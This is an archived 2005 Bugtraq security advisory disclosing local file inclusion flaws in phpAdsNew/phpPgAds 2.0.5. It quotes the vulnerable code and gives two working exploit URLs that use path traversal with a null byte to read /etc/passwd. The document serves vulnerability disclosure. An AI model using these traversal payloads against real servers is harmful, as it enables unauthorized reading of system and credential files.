[SECURITYREASON.COM] phpAdsNew/phpPgAds 2.0.5 Local file inclusion cXIb8O3.16

max_at_jestsuper.pl
Date: 08/17/05

  • Next message: Luigi Auriemma: "Buffer-overflow in Chris Moneymaker's World Poker Championship 1.0" 
    Date: 17 Aug 2005 17:33:45 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is) -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    [phpAdsNew/phpPgAds 2.0.5 Local file inclusion cXIb8O3.16]

    Author: Maksymilian Arciemowicz (cXIb8O3)
    from SECURITYREASON.COM TEAM

    Date: 14.07.2005 (01:54 GMT+01.00)

    - --- 0.Description ---
    phpAdsNew is an open-source ad server, with an integrated banner management interface and tracking system for gathering statistics. With phpAdsNew you can easily rotate paid banners and your own in-house advertisements. You can even integrate banners from third party advertising companies.

    - --- 1. Local file inclusion ---
    In phpAdsNew and phpPgAds 2.0.5 exists two bugs. First bug exist in adlayer.php.

    Code:
    - -151-153---
    phpAds_registerGlobal ('what', 'clientid', 'clientID', 'context',
    'target', 'source', 'withtext', 'withText',
    'layerstyle');
    - -151-153---

    and

    - -178-182---
    if (!isset($layerstyle) || empty($layerstyle)) $layerstyle = 'geocities';

    // Include layerstyle
    require(phpAds_path.'/libraries/layerstyles/'.$layerstyle.'/layerstyle.inc.php');
    - -178-182---

    Varible $layerstyle isn't filtered and you can try to include local file.

    For example error:

    http://[HOST]/[DIR]/adlayer.php?layerstyle=securityreason.com

    and you can see error like this:

    - ---
    <br />
    <b>Warning</b>: main(): Unable to access ./libraries/layerstyles/securityreason.com/layerstyle.inc.php in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
    <br />
    <b>Warning</b>: main(./libraries/layerstyles/securityreason.com/layerstyle.inc.php): failed to open stream: No such file or directory in <b>/www/phpadsnew-2.0.5/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
    <br />
    <b>Fatal error</b>: main(): Failed opening required './libraries/layerstyles/securityreason.com/layerstyle.inc.php' (include_path='.:') in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
    - ---

    Exploit:
    http://[HOST]/[DIR]/adlayer.php?layerstyle=../../../../../../../etc/passwd%00

    Magic_quotes must be OFF .

    Next problem exist in ./admin/js-form.php

    Code:
    - -26-28---
    @include (phpAds_path.'/language/english/default.lang.php');
    if ($HTTP_GET_VARS['language'] != 'english' && file_exists(phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php'))
    @include (phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php');
    - -26-28---

    And if magic_quotes_gpc = Off, you can do attack.
    Exploit:

    http://[HOST]/[DIR]/admin/js-form.php?language=../../../../../../../../../../etc/passwd%00

    but here you don't see any error because first is function file_exists.

    - --- 3. How to fix ---

    Download the new version of the script.

    - --- 4. Greets ---

    sp3x

    - --- 5.Contact ---
    Author: Maksymilian Arciemowicz < cXIb8O3 >
    Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
    GPG-KEY: http://securityreason.com
    WWW: http://securityreason.com

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.0 (FreeBSD)

    iD8DBQFC23pYznmvyJCR4zQRAnKUAJ9oc6khDtnehufyXWMZQK1i5AFnJgCgmUjC
    hROFCdP7k+/pi1dS9SJjCOw=
    =yRLH
    -----END PGP SIGNATURE-----

  • Next message: Luigi Auriemma: "Buffer-overflow in Chris Moneymaker's World Poker Championship 1.0"
    • Quantcast